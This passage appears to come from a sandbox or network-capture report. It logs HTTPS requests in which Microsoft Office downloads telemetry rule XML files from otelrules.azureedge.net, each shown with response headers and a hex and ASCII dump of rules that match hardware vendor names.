                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      95192.168.2.45125513.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:01 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 3788
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 041e76a7-601e-005c-45ae-26f06f000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182001Z-16849878b786lft2mu9uftf3y40000000b3000000000qdf8
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      96192.168.2.45126213.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:02 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182002Z-16849878b78bjkl8dpep89pbgg00000008qg000000000c84
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      97192.168.2.45126313.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:02 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 632
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182002Z-16849878b78fkwcjkpn19c5dsn00000008zg0000000048q4
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      98192.168.2.45126013.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:02 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182002Z-16849878b78fssff8btnns3b140000000a8g00000000276h
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      99192.168.2.45126413.107.246.454437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:02 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 467
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d6813257-101e-0034-034f-2896ff000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182002Z-15b8d89586fmhkw429ba5n22m80000000bcg00000000c7rg
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      100192.168.2.45126113.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:02 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 633f9008-101e-00a2-3e9b-279f2e000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182002Z-16849878b78j7llf5vkyvvcehs0000000b0g00000000ag9h
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:02 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      101192.168.2.45126613.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:03 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182003Z-16849878b786fl7gm2qg4r5y700000000a6000000000cvy5
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      102192.168.2.45127013.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:03 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d7faccb9-c01e-002b-307f-276e00000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182003Z-16849878b78tg5n42kspfr0x4800000009u000000000wp1x
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      103192.168.2.45126813.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
